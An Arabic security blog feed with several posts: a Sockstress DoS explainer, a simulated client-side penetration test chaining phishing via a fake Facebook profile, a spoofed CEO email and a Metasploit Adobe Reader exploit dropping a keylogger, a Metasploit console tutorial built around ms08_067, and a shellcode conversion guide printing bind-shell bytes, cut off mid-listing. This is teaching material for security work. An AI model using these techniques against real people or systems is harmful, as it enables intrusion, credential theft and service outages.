مجتمع الحماية العربي » تجربة الإختراق

مفاهيم هجوم Sockstress

نبراس القرشي — Thu, 17 May 2012 12:51:01 +0000

مقدمة

يعتبر Sockstress من أخطر أنواع هجوم الـ (DoS)، حيث أن هذا الهجوم يعتمد على إكمال الـ (TCP 3-Way Handshaking) حتى يظهر بأنه عملية إتصال طبيعية، ويحتاج إلى إمكانيات قليلة مقارنة بالأنواع الأخرى من هجوم الـ (DoS)، ويعتمد بشكل أساسي على خاصية الـ (Window Size).
إن من التحسينات التي تمت على الـ (TCP) هو استخدام خاصية الـ (TCP Window Size)، فبعد القيام بعملية (3-Way Handshaking) يتبادل جهاز الـ (Server) مع جهاز الـ (Client) حجم المعلومات التي يستطيع استقبالها في كل (Packet) دون الحاجة إلى تأكيد (Ack) في هذه العملية الأخيرة.
هجوم (SockStress) يعتمد على إستخدام هذه الخاصية لاستنزاف موارد الـ (Server), حيث يقوم هذا الهجوم باستنزاف الذاكرة لدى الـ (Server) بسرعة فائقة من خلال تقليص حجم الـ (TCP Window Size), هذا الهجوم فعال على كل أنظمة التشغيل(Windows , LinuxM , BSD) و جميع أجهزة الشبكات (Routers, L3 Switches) و أي تطبيق يقبل الاتصال على بروتوكول الـ TCP.

مفهوم هجوم الـ Sockstress

1) يبدء المهاجم الإتصال مع الـ (Server) من خلال عملية (TCP 3-Way Handshaking) طبيعية.
2) يقوم المهاجم بإرسال (2 TCP Queries) على التوالي إلى الـ (Server)
2.a) طلب معلومات عادية من الـ (Server) تتطلب رداً إلى الـ (Client).
2.b) الـ (TCP Packet) تعلم الـ (Server) أن جهاز الـ (Client) لا يستطيع أن يستقبل أي معلومات حالياً (Window Size = Zero).

3) يبقي المهاجم الإتصال مفتوح، وبنفس الوقت يبقي (Window Size = 0) بمعنى أنه لا يستطيع أن يستقبل أية معلومات.

4) كنتيجة لهذا الاتصال, فإن الـ (Server) بداية يقوم بتحضير المعلومات التي طلبها الـ (Client)، لكنه يبقيها في الذاكرة لأن العميل قد أخبره مباشرة بعد طلبه هذه المعلومات أنه لا يستطيع إستقبالها، وكنتيجة لذلك فإن ذاكرة الـ (Server) تمتلئ بوقت قياسي عندما يقوم المهاجم بتكرار هذا الإتصال لفترة قليلة نسبياً، مما يؤدي إلى عدم تمكن الـ (Server) من التعامل مع أي إتصال جديد والوصول إلى حالة من الـ (Memory Overflow)، وهي النتيجة التي تحصل عادة من جميع أنواع هجوم الـ (DoS).

لتحميل أداة هذا الهجوم ورؤية طريقة إستخدامها على الرابط التالي:
https://defuse.ca/sockstress.htm

حيث أنني وجدت في هذا الموقع شرحاً مبسطاً لإستخدام هذه الأداة للقيام بهجوم (SockStress), لكن يرجى العلم بأن طريقة الحماية المشروحة في هذا الموقع غير عملية أبداً وغير مجدية.
وأقترح هنا استخدام (Proactive Intrusion Prevention)، مثل NETASQ الذي يقوم بعمل فحص كامل لـِ (TCP)، ويقوم بمتابعة حالة جميع الإتصالات المفتوحة، وبإستخدام التحليل الإحصائي والإعتماد على تحليل الـ (Heuristic) يستطيع التمييز باختلاف حجم الـ (Window Size)، وتحديد ما يصلح منها. وكنتيجة لذلك فإنه يسمح فقط للإتصالات الحقيقة بالوصول إلى الـ (Server)، وإيقاف جميع إتصالات الهجوم.

© nebras qurashi for مجتمع الحماية العربي, 2012. | Permalink | 7 comments | Add to del.icio.us
Post tags: DoS, Sockstress

Feed enhanced by Better Feed from Ozh

محاكاة هجوم على جانب العميل لأحد الشركات من البداية الى الاختراق الكامل

ابراهيم حجازي — Sun, 29 Apr 2012 18:43:41 +0000

بسم الله والصلاة والسلام علي رسول الله سيدنا محمد ومن تبعه ووالاه

درس اليوم ان شاء الله من النوع الدسم الذي سيشمل نقاط عديده غايه في الأهميه بدايه من معرفة البرامج التي يستخدمها الشخص علي جهازه وتحديد إصداراتها الي إنهاء عملية الإختراق والحصول علي صلاحيه كاملة علي جهاز الضحية.

“هذا الموضوع سيتم تطبيقه بنظام المحاكاه في تطبيق عملية إختبار إختراق لشركة ما تسمي Xcompany”

سيناريو الهجوم - الصورة نقلاً عن معهد سانز لأمن المعلومات

“أتت الشركه المسماه Xcompany الى الشركة التي أعمل لديها وطلبت التعاقد علي تنفيذ هجمات من نوع Client Side Attacks على العاملين بالشركة للتأكد من سلامة أجهزة العاملين بها ضد عمليات الإختراق العشوائية والموجهة وطلبت الشركه أن تكون عملية الإختراق من نوع Grey Box Test، حيث قامت بإعطائنا إميلات للعاملين بالشركة وبعض حسابات الفيس بوك التابعة لهم المطلوب إختراق أكبر قدر من أجهزة العاملين بالشركة للوصول إلي أكبر قدر من البيانات كنوع من محاكاة هجوم فعلي علي الشركه من قبل قراصنة الإنترنت ”

والآن كيف سنقوم بتنفيذ هذا الهجوم والحصول علي المطلوب؟

ملحوظه قبل البدأ بالتطبيق العملي: إن مجال الهجوم علي جانب العميل مجال واسع جدا لكنني سأشمل بهذا الدرس نقاط مهمة فيه فلا يسعني أن أشمله كاملا في موضوع او حتي 10 مواضيع.

ما الذي سنحتاجه لتطبيق هذا الدرس ؟

1- تحديد الأهداف

2- Plugins Detector

3- Metasploit

4- Exploiting

نبدأ التطبيق على بركة الله

1- تحديد الهدف لدينا قائمة بإميلات العاملين بالشركه ولدينا حساباتهم في الفيس بوك

حسنا , المرحله الثانيه 2- Plugins Detector.

ما هو Plugins Detector طبعا كما سبق وذكرت انني احتاج الي تحديد البرمجيات التي يستخدمها العاملين بالشركه علي أجهزتهم واصداراتها أيضا حتي أتمكن من تحديد ثغرات لها ثم أقوم بتطبيق هذه الثغرات عليهم بشكل جماعي حتي اختراقهم اذا كيف أستطيع ذلك وليس لدي سوى إميلاتهم وبعض حساباتهم؟

البعض سيقول احصل على العنوان الخاص بهم (IP)، ومن ثم اقوم بفحصه بالميتا الخ الخ. هذا الأمر غير مجدي. دعك من ان النتيجة في الغالب لن تصل بك لشئ. فلن تستطيع استخراج البرامج واصداراتها التي يستخدمها الضحيه علي جهازه من خلال الميتا سبلويت. هل يمكنك مثلا معرفة اذا ما كان الضحيه يستخدم اكروبات ريدر او جافا او فلاش علي جهازه ومعرفة اصداراتها وكل هذا من خلال الميتا سبلويت ؟ لا بالطبع. لذا نحتاج الى طريقة أفضل وأسرع لأن عملية إختبار الإختراق تكون محددة المدة.

الموضوع ببساطه يعتمد على الإضافات (Plugins) التي تعمل علي المتصفح فعلي سبيل المثال اذا قمت انت بتنصيب الجافا علي جهازك فانها ستقوم تلقائيا بتنصيب إضافة في متصفحك لكي يدعم الجافا ونفس الموضوع يتم في حالة تنصيبك لبرنامج .Flash Player

اضافات المتصفح

كاشف الاضافات (Plugin Detector) هو عبارة عن كود بي اتش بي ترفعه الي موقعك فيصبح بشكل site.com/pd.php عندما يقوم الشخص بفتح الرابط يقوم الكود بفحص الإضافات الموجودة في متصفحه لمعرفة البرمجيات التي يستخدمها وإصداراتها وبعض البيانات الاخري من الرأسيات (Headers) الخاصة بالمتصفح ثم يقوم بكتابة ملف نصي في نفس المجلد المرفوع فيه ويقوم بوضع البيانات التي حصل عليها من حاسوب الزائر و يمكنك تصفحها ومعرفة الاصدارات للبرامج التي يستخدمها ثم تبحث عن ثغرات لها .

طبعا لا يمكنني ان ارسل الرابط بهذا الشكل لذا قمت بحجز دومين (نطاق) باسم لا يثير الشكوك وقمت بعمل صفحة فرعية علي الدومين تحتوي علي موضوع عن المجال الذي تختص به الشركه Xcompany وقمت بعمل include للملف pd.php داخل الصفحه التي تحتوي الموضوع

[code][/code]

أصبح الآن لدي صفحتي بالشكل التالي

[QUOTE]http://www.GoodDomainName.com/News.php?id=4356[/QUOTE]

الآن من خلال الفيس بوك أقوم بعمل حساب عشوائي وأقوم بوضع المهنة في الحساب نفس المهنة التي تتخصص فيها الشركة Xcompany وباقي البيانات علي نفس المجال وأقوم بعمل إضافة لحسابات العاملين بالشركة وإرسال الرابط بالأعلى لهم تحت عنوان مثير فلنفرض انه الشركه تعمل بمجال السيارات:

طفرة في عالم تصنيع السيارات والمفاجأه بأيادي عربية! تفاصيل الخبر على : [QUOTE]http://www.GoodDomainName.com/News.php?id=4356[/QUOTE]

في غضون ساعه كان لدي بيانات البرامج الخاصة بثلاثة أشخاص من العاملين بالشركه

بيانات المستخدمين الثلاثة

وسأخذ منهم ثاني شخص وكما ترون , يقوم بإستخدام برنامج أدوبي أكروبات ريدر إصدار 9.1 لقرائة ملفات .pdf

المرحله الثالثة: Metasploit

الآن نذهب إلى الميتاسبلويت ونكتب search adobe acrobat reader

البحث عن ادوبي في ميتاسبلويت

ممتاز لدينا ثغره لهذا الإصدار وهي ثغرة libtiff, دون الدخول في تفاصيل تم شرحها من قبل آلاف المرات. نقوم بإعداد الثغرة واختيار البايلود من نوع تنزيل وتشغيل

windows/download_exec والذي سيقوم بتنزيل وتشغيل ملف التروجان الخاص بي والذي سيتيج لي التحكم في جهاز هذا الشخص وأصبح لدي الآن ملف Report.pdf الذي يحوي استغلال الثغرة

الان باقي مرحلة إرسال هذا الملف إلي الشخص المطلوب, والبريد الذي لدي لهذا الشخص هو Victim1@Xcompany.com

لكن كيف سيقبل هذا الشخص مني الملف ويقوم بفتحه؟ بعد تفكير وصلت إلي فكرة إستخدام Mailer وأقوم بإرسال رسالة من إميل مدير الشركه الي إميل هذا الشخص اخبره فيها بأنني اريده ان يطلع علي هذا التقرير الهام جداً عن الشركة والمرفق في الرسالة.

انتحال البريد الالكتروني لصاحب الشركة

تم الإرسال والآن بإنتظار النتيجة.

ممتاز الان تلقيت ال Notification الان الكيلوجر (مسجل المفاتيح) يعمل علي جهاز الضحية ويقوم بإرسال كلمات المرور لي أول بأول من جهازه.

وبهذه الطريقه نجحت في إختراق أول جهاز في فتره بسيطه

إن شاء الله الدرس القادم سأشرح طريقة لإختراق إميلات باقي الأشخاص وحساباتهم في عملية واحدة لا يتعدى استغلالها اكثر من نصف ساعة من خلال الجهاز الذي تم إختراقه مسبقا . فلا تنسوا انني الآن داخل شبكة الشركه .

إن شاء الله ان الدرس مشروح بطريقة مفهومة لغير المحترفين وأخلي مسؤوليتي من أي إستخدام غير أخلاقي لهذا الدرس هذا وصلى الله وسلم على سيدنا محمد.

© إبراهيم حجازي for مجتمع الحماية العربي, 2012. | Permalink | 10 comments | Add to del.icio.us
Post tags: اختبارات الاختراق, اختراق

Feed enhanced by Better Feed from Ozh

استخدام بيئة العمل Metasploit عن طريق Msfconsole

Fayez — Fri, 15 Jul 2011 15:46:03 +0000

مقدمة

يتعبر Msfconsole هو الاشهر والاكثر استخدام في MSF. وهو يسمح با الوصل الوهمي الى كافة الخيارات المتوفرة في MSF. وعند استخدامك Msfconsole في البداية سوف تجد صعبوه في التعامل، لكن مع تعلم (syntax)تنفيذ الاومر سوف تقدر قوة هذة الواجهه.

فوائد msfconsole :

يدعم طريق الوصول الى معظم الخصائص المتوفرة في MSF.
يعتبر اكثر والواجهات استقراراً في الاستخدام.
يدعم التكملة التلقائية لتنفيذ الاوامر.
أمكانية تنفيذ يعض الاوامر الاضافية مثل (ping… وغيرها).
تشغيل (msfconsole):
بمكانك تشغيل msfconsole بكل سهوله بختيارة من القائمه في الباك تراك او بتنفيذ الامر في shell “./msfconsole” وبامكانك تمرير متغير “-h” لمشاهدة متغيرات خيارات الاستخدام.

المساعدة help:

قم بادخال الامر “help ” او “؟” وسوف تقوم بعرض العديد من الاوامر با الاضافة الى وصف لما تستخدم هذه الاوامر.

التكملة التلقائية :
صمم msfconsole ليكون سريع في الاستخدام واحد الخصائص التي تساعد في هذا الغرض هي التكلمة التلقائية(tab completion). مع وجود العديد من موديلز(modules)، يصعب عليك تذكراسم او مسار المديول(module) الذي تريد استخدامه.
وكما هو العادة في العديد من shells تقوم با الضغط على “tab” والذي سوف يقوم بعرض العديد من الخيارات او سوف يكمل تلقائياً اذا كان خيار واحد فقط .

use exploit/windows/dce

use .*netapi.*

set LHOST

set TARGET

set PAYLOAD windows/shell/

exp

show

أمر العودة الى الخلف (back):

عندما تنتهي من العمل مع موديل (module) معين او انك قد اخترت موديل(module) بالخطاء، في هذه الحالة تريد العودية الى الحالة السابقة لك، قم بادخال الامر “back” لكي تعودي الى ماقبل اختيارك.

msf auxiliary(ms09_001_write) > back

msf >

أمر الفحص (check) :

يقوم بفحص نظام الهدف هل هو مصاب با الاستغلال ام لا، قبل تنفيذ الاستغلال. وهذا الامر لايدعم العديد من الاستغلالات.

msf exploit(ms04_045_wins) > show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 192.168.1.114 yes The target address

RPORT 42 yes The target port

Exploit target:

Id Name

-- ----

0 Windows 2000 English

msf exploit(ms04_045_wins) > check

[-] Check failed: The connection was refused by the remote host

(192.168.1.114:42)

أمر الاتصال (connect):

هذا الامر يقوم بعمل شبية بعمل netcat وهو مبني ضمن msfconsole ويدعم SSL، proxies ،pivoting و ارسال الملفات. بتنفيذ الامر “connect” مع ايبي ادرس (IP Address ) و منفذ(Port)، وبمكانك الاتصال با الجهاز البعيد من خلال msfconsole مثل ماهو netcat او telnet.

msf > connect 192.168.1.1 23

[*] Connected to 192.168.1.1:23

DD-WRT v24 std (c) 2008 NewMedia-NET GmbH

Release: 07/27/08 (SVN revision: 10011)

DD-WRT login:

وبتمرير المتغير “-s” في الاتصال سوف يكون الاتصال عبر SSL.

msf > connect -s www.metasploit.com 443

[*] Connected to www.metasploit.com:443

GET / HTTP/1.0

HTTP/1.1 302 Found

Date: Sat, 25 Jul 2009 05:03:42 GMT

Server: Apache/2.2.11

Location: http://www.metasploit.org/

أمر ((exploit مقابل (run) :

عندما يتم تنفيذ اي إستغلال يكون بتنفيذ امر “exploit”، بينما عندما تستخدم auxiliary module يكون الانسب بتنفيذها من خلال الامر “run”. وايضا يمكنك استخدام امر “exploit”.

msf auxiliary(ms09_001_write) > run

Attempting to crash the remote host...

datalenlow=65535 dataoffset=65535 fillersize=72

rescue

datalenlow=55535 dataoffset=65535 fillersize=72

rescue

datalenlow=45535 dataoffset=65535 fillersize=72

rescue

datalenlow=35535 dataoffset=65535 fillersize=72

rescue

...بقية النتائج...

أمر (irb) :

بتنفيذ هذا الامر تقوم با الدخول على سكربت لغة الروبي وتستطيع تنفيذ اوامر الروبي مباشرة من msfconsole، وهذه الميزة مفيدة جداً حيث تساعدك على فهم Framework.

msf > irb

[*] Starting IRB shell...

>> puts "Hello, Fayez!"

Hello, Fayez!

>> Framework::Version

=> "3.7.0-release"

أمر (jobs) :

يقوم بعرض وإدارة المديول(modules) التي تشتغل في الخلفية(Background). وبتنفيذ امر “jobs” يكون بمكانك عرض وإنها
هذه الاعمل(jobs).

msf exploit(ms08_067_netapi) > jobs -h

Usage: jobs [options]

Active job manipulation and interaction.

OPTIONS:

.-K Terminate all running jobs

. -h Help banner

-i Lists detailed information about a running job.

-k Terminate the specified job name.

-l List all running jobs.

-v Print more detailed info. Use with -i and –l.

أمر (load/unload):

بتنفيذ أمر لود “load” متبوع بـاسم إضافة(plugin) من الاضافات التي تكون متواجدة ضمن مجلد (plugin) في metasploit. وتمرر المتغيرات با الشكل التالي ” key=val” داخل وامر الشل.

msf > load

Usage: load [var=val var=val ...]

Load a plugin from the supplied path. The optional

var=val options are custom parameters that can be

passed to plugins.

msf >; load pcap_log

[*] Successfully loaded plugin: pcap_log

بلمقابل، امر “unload” يقوم بازالة ماتم تحميلة في الامر السابق.

msf >; unload pcap_log

Unloading plugin pcap_log...unloaded.

أمر (loadpath) :

أذا كان لديك بعض payloads، encoders او استغلال لثغرة يوم الصفر بمكانك تحديد المسار للمديول(module) الخاص بك. حيث ان هذا الامر يستخدم لإضافة مسار لموديلز(modules) طرف ثالث.

msf >; loadpath /home/secret/modules

Loaded 0 modules.

أمر (resource) :

بعض انواع الهجوم مثل Karmetasploit تستخدم لتنفيذ عدد من الاوامر المرتبة بشكل متسلسل داخل ملف دفعي(batch file) يتم تنفيذه من خلال msfconsole بتنفيذ امر “resource” متبوع باسم الملف.

msf > resource karma.rc

resource> load db_sqlite3

[-]

[-] The functionality previously provided by this plugin has been

[-] integrated into the core command set. Use the new 'db_driver'

[-] command to use a database driver other than sqlite3 (which

[-] is now the default). All of the old commands are the same.

[-]

[-] Failed to load plugin from

/pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin

resource> db_create /root/karma.db

[*] The specified database already exists, connecting

[*] Successfully connected to the database

[*] File: /root/karma.db

resource> use auxiliary/server/browser_autopwn

resource> setg AUTOPWN_HOST 10.0.0.1

AUTOPWN_HOST => 10.0.0.1

…باقي النتائج…

وهذه الملفات الدفعية(batch files) تساعد في تسريع الاختبار(testing) والتطوير(development) ، با الاضافة الى انه يسمح للمستخدم بتنفيذ العديد من المهام بشكل اتوماتيكي او اّلي، وباستطاعتك تنفيذ الملف في عملية بداء التشغيل msfconsole بتمرير متغير ‘-r’. وفي المثالي التالي سوف نقوم بنشاء ملف يظهر اصدار metasploit في بداء التشغيل

أمر (route) :

يسمح هذا الامر بإعادة توجية السوكيت(sockets) من خلال session او comm. ولكي يضيف امر إعادة التوجية تقوم بتمرير السب نت (subnet) وقناع الشبكة (network mask) متبوع برقم session او comm. لاحظ المثال التالي.

msf exploit(ms08_067_netapi) > route

Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]

Route traffic destined to a given subnet through a supplied session.

The default comm is Local.

msf exploit(ms08_067_netapi) > route add 192.168.1.0 255.255.255.0 3

msf exploit(ms08_067_netapi) > route print

Active Routing Table

====================

Subnet Netmask Gateway

------ ------- -------

192.168.1.0 255.255.255.0 Session 3

أمر (info) :

سوف يقوم بتزويدك بمعلومات تفصيلية عن موديل(module) معين ويقوم بعرض كافة الخيارات و الاهداف المصابة ومعلومات اخرئ.
و امر ‘info’ سوف يقوم بتزويدك با المعلومات التالية :
معلومات عن الكاتب و الرخصة.
مراجع الثغرة مثل (CVE,BID.. الخ).
اي من payload التي تشتغل فقط مع هذا Module.

msf > info dos/windows/smb/ms09_001_write

Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset

Version: 6890

License: Metasploit Framework License (BSD)

Provided by:

j.v.vallejo

أمر (set/unset) :

يسمح للمستخدم بضبط إعدادات وخيارات بيئة العمل و المتغيرات للمويل(module) الذي تعمل علية.

msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1

RHOST => 192.168.1.1

msf auxiliary(ms09_001_write) > show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 192.168.1.1 yes The target address

RPORT 445 yes Set the SMB service port

في الايام الاخير تم اضافة ميزة جديدة في بيئة عمل metasploit و هي أستخدام مشفرات(encoders) وقت التشغيل (run time) وهذه تكون مفيدة في تطوير الاستغلال عندما لا تكون متاكد اي نوع من الباي لود(payloads) سوف يشتغل مع الاستغلال.

msf exploit(ms08_067_netapi) > show encoders

Compatible encoders

===================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

cmd/generic_sh good Generic Shell Variable Substitution Command Encoder

cmd/ifs low Generic ${IFS} Substitution Command Encoder

cmd/printf_php_mq good printf(1) via PHP magic_quotes Utility Command Encoder

generic/none normal The "none" Encoder

mipsbe/longxor normal XOR Encoder

mipsle/longxor normal XOR Encoder

php/base64 great PHP Base64 encoder

ppc/longxor normal PPC LongXOR Encoder

ppc/longxor_tag normal PPC LongXOR Encoder

sparc/longxor_tag normal SPARC DWORD XOR Encoder

x64/xor normal XOR Encoder

x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder

x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder

x86/avoid_utf8_tolower manual Avoid UTF8/tolower

x86/call4_dword_xor normal Call+4 Dword XOR Encoder

x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder

x86/context_stat manual stat(2)-based Context Keyed Payload Encoder

x86/context_time manual time(2)-based Context Keyed Payload Encoder

x86/countdown normal Single-byte XOR Countdown Encoder

x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder

x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder

x86/nonalpha low Non-Alpha Encoder

x86/nonupper low Non-Upper Encoder

x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder

x86/single_static_bit manual Single Static Bit

x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder

x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai

encoder => x86/shikata_ga_nai

أمر (unset) :

وهذا الامر هو عكس امر ‘set’.ويقوم بأزإلة المتغيرات التي قادم بضبطها وإضافتها أمر ‘set’، ويمكنك إزالة جميع المتغيرات مره واحده بأمر ‘unset all’.

msf > set RHOSTS 192.168.1.0/24

RHOSTS => 192.168.1.0/24

msf > set THREADS 50

THREADS => 50

msf > set

Global

======

Name Value

---- -----

RHOSTS 192.168.1.0/24

THREADS 50

msf > unset THREADS

Unsetting THREADS...

msf > unset all

Flushing datastore...

msf > set Global

======

No entries in data store.

أمر (sessions) :

هذا الامر يقوم بعرض و التفاعل او انهئ او تنقل بين الجلسات التي تكون فعالة وهذه الجلسات تكون عبارة عن شل(shell)، ميتربريتر(Meterpreter sessions) او VNC … الخ.

msf > sessions -h

Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

-K Terminate all sessions

-c Run a command on the session given with -i, or all

--d Detach an interactive session

-h Help banner

-i Interact with the supplied session ID

--k Terminate session

--l List all active sessions

-q Quiet mode

-r Reset the ring buffer for the session given with -i, or all

-s Run a script on the session given with -i, or all

-u Upgrade a win32 shell to a meterpreter session

-v List verbose fields

ولكي تقوم بعرض الجلسات(sessions) النشطة، مرر حرف ‘-l’ الى امر ‘sessions’.

msf exploit(ms08_067_netapi) > sessions -l

Active sessions

===============

Id Description Tunnel

-- ----------- ------

1 Command shell 192.168.1.20:33191 ->; 192.168.1.22:4444

عندما تريد التعامل مع أحد الجلسات النشطة، فعليك تمرير المتغير ‘-i’ متبوع برقم الجلسة ‘session id’ لاحظ المثال التالي:

msf exploit(ms08_067_netapi) > sessions -i 1

[*] Starting interaction with 1...

C:\WINDOWS\system32

أمر (search) :

يقوم هذا الامر ببحث شامل داخل الموديلز(modules) وبادخال جز من اسم الموديل او الاسم كامل فيقوم بعرض بيانات الموديل من الاسم، وصف عن الموديل … الخ.

msf > search ms08_067_netapi

[*] Searching loaded modules for pattern 'ms08_067_netapi'...

Exploits

========

Name Disclosure Date Rank Description

---- --------------- ---- -----------

windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption

أمر (show) :

بأدخال أمر ‘show’ في ‘msfconsole’ سوف يعرض لك كافة الموديلز ‘modules’ داخل MSF .

msf > show

encoders

========

Name Disclosure Date Rank Description

---- --------------- ---- -----------

cmd/generic_sh good Generic Shell Variable Substitution Command Encoder

cmd/ifs low Generic ${IFS} Substitution Command Encoder

cmd/printf_php_mq good printf(1) via PHP magic_quotes Utility Command Encoder

generic/none normal The "none" Encoder

mipsbe/longxor normal XOR Encoder

mipsle/longxor normal XOR Encoder

...ألخ..

وأيضاً بمكانك عرض كل موديلز على حدة مثل ‘show auxiliary’، ‘show exploits’، ‘show payloads’،
‘show encoders’ او ‘show nops’. سوف اتركك عزيزي القراء لكي تقوم بتجربة هذه الاوامر.

سوف نقوم بستخدام معين لامر ‘show’ عندما تقوم باختيار ثغرة معينة ولناخذ على سبيل المثال ‘ms08_067_netapi’

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) >

في الامر السابق لقد قمنا باختيار ثغرة ‘ms08_067_netapi’. وفي الامر التالي سوف نقوم بعرض فقط الباي لودز ‘payloads’ التي تتوافق فقط مع الثغرة، ولنفرض ان الثغرة تستهدف فقط انظمة ويندوز، سوف يعرض فقط الباي لودز المتعلقة با الوندوز ولن يعرض الباي لودز الخاصه بنظام لنيكس.

msf exploit(ms08_067_netapi) > show payloads

Compatible Payloads

===================

Name Disclosure Date Rank Description

----------- ---- --------------- -----------

generic/debug_trap normal Generic x86 Debug Trap

generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline

generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline

generic/tight_loop normal Generic x86 Tight Loop

windows/adduser

…الخ…

والان نريد ان نعرض الخيارات المتطلبة لتنفيذ هذه الثغرة مثل ايبي الهدف و البورت وغيرها لاحظ المثال التالي :

msf exploit(ms08_067_netapi)> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER,SRVSVC)

Exploit target:

Id Name

-- ----

0 Automatic Targeting

وإذا لم تكن متاكد اي إصدار من نظام التشغيل مصاب بهذه الثغرة قم بتنفيذ الامر التالي :

msf exploit(ms08_067_netapi)> show targets

Exploit targets:

Id Name

-- ----

0 Automatic Targeting

1 Windows 2000 Universal

2 Windows XP SP0/SP1 Universal

3 Windows XP SP2 English (NX)

4 Windows XP SP3 English (NX)

5 Windows 2003 SP0 Universal

…الخ…

وإذا كنت تريد مشاهدة خيارات متقدمة فماعليك الا تنفيذ الامر التالي :

msf exploit(ms08_067_netapi)> show advanced

Module advanced options:

Name : CHOST

Current Setting:

Description : The local client address

Name : CPORT

Current Setting:

Description : The local client port

أمر (setg) :

إذا كنت تريد ان تحفظ الكثير من الوقت عند عملك اختبار اختراق لنظام معين با إستطاعتك تحديد بعض
‘global variables’ في ‘msfconsole’. وذلك بأستخدام أمر ‘setg’ وعندما يتم تحديد المتغير بستطاعتك
إستخدامة في العديد من (exploits and auxiliary modules) وأيضا تستطع حفظهم لكي تقوم باستخدامهم في المره القادمة، ويجب عليك التاكد دئماً من جميع الخيارات قبل تفيذك أمر ‘run’ او ‘exploit’. وبالمقابل يمكنك إزلة هذه المتغيرات بستخدامك أمر ‘unsetg’ لاحظ المثالي التالي:

msf > setg LHOST 192.168.1.20

LHOST => 192.168.1.20

msf > setg RHOST 192.168.1.22

RHOST => 192.168.1.22

وبعد تحديد بعض المتغيرات مثل عنوان الايبي المحلي و عنوان الايبي البعيد او الهدف يمكننا حفظ هذه التغيرات بامر ‘save’. وفي المره القادمة عند تشغيل ‘msfconsole’ سوف تكون هذه المتغيرات مضبوطه مثلما حددناها.

msf > save

Saved configuration to: /root/.msf3/config

msf >

أمر (use) :

عندما تريد استخدام موديل ‘module’ لثغرة معينة إستخدم أمر ‘use’ ومن ثم اختر اسم الموديل. ولاحظ ان ‘global variables’ قمنا بضبطها في الامر السابق لكي تشير الى عنوان ايبي الهدف وعنوان الوكال الايبي .

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

RHOST 192.168.1.22 yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name

0 Automatic Targeting

Feed enhanced by Better Feed from Ozh

فيديو: اكتشاف و استغلال ثغرات Buffer OverFlows

بشار — Wed, 02 Mar 2011 04:15:49 +0000

على عادته دائماً، قام الأخ محمد رمضان بتزويدينا بفيديو يشرح عملية اكتشاف ثغرات Buffer Over Flow من الصفر وحتى كتابة كود الاستغلال واختراق النّظام. ومع أنّ الفيدو قد تمّ نشره على موقع عربي شقيق وشيّق إلّا أنّ أهميّة الموضوع وطريقة الشّرح تجعلنا نعيد نشره هنا في مجتمع الحماية العربي
المشاهدة بأعلى جودة و نقاء HD مباشرة

http://mohaab.blip.tv/file/4807148/

للتحميل بأعلى جودة و نقاء HD مباشرة

http://bit.ly/eLSZIO

رابط مباشر و سريع للادوات و البرامج مجمعة كلها

http://dl.dropbox.com/u/12545954/tools.rar

Feed enhanced by Better Feed from Ozh

تحويل الـ Shellcode من Hex إلى Binary و العكس

صبري صالح — Fri, 14 Jan 2011 01:19:23 +0000

غالبا نستخدم الـ Metasploit في إنشاء الـ Shellcdoe لكن ماذا لو لم تناسبنا أي من هذه الـ Shellcodes لعلة معينه ؟ وقتها سنتحتاج أن نبحث على Shellcodes من مصادر أخرى و قد نجدها بامتداد “bin” وقتها, سنحتاج إلى تحول الـ Shellcode من Binary إلى Hex لكي نضعه في الـ Exploit خاصتنا.
في هذه الحالة سنحتاج إلى تحميل السكربت pveReadbin.pl لمبرمجه Peter Van.

أيضا قد تواجه حالة تحتاج فيها أن يكون الـ Shellcdoe خاصتك في ملف binary, مثلا في حالة استخراج الـ Bad Characters و في هذه الحالة سنحتاج إلى تحميل السكريبت pveWritebin.py

تحويل الـ Shellcode من Binary إلى Hex

- لتحميل الأداة pveReadbin

- طريقة الاستخدام

perl pveReadbin.pl shellcode.bin

مثال:

perl pveReadbin.pl w32-bind-ngs-shellcode.bin

Reading w32-bind-ngs-shellcode.bin

Read 214 bytes

--------------------------------------------

Displaying bytes as hex :

--------------------------------------------

"\x31\xc9\x64\x8b\x71\x30\x8b\x76".

"\x0c\x8b\x76\x1c\x8b\x6e\x08\x8b".

"\x7e\x20\x8b\x36\x38\x4f\x18\x75".

"\xf3\x51\x68\x32\x5f\x33\x32\x68".

"\x66\x56\x77\x73\x68\xb7\x8f\x09".

"\x98\x89\xe6\xb5\x03\x29\xcc\x29".

"\xcc\x89\xe7\xd6\xf3\xaa\x41\x51".

"\x41\x51\x57\x51\x83\xef\x2c\xa4".

"\x4f\x8b\x5d\x3c\x8b\x5c\x1d\x78".

"\x01\xeb\x8b\x4b\x20\x01\xe9\x56".

"\x31\xd2\x42\x8b\x34\x91\x01\xee".

"\xb4\x36\xac\x34\x71\x28\xc4\x3c".

"\x71\x75\xf7\x3a\x27\x75\xeb\x5e".

"\x8b\x4b\x24\x01\xe9\x0f\xb7\x14".

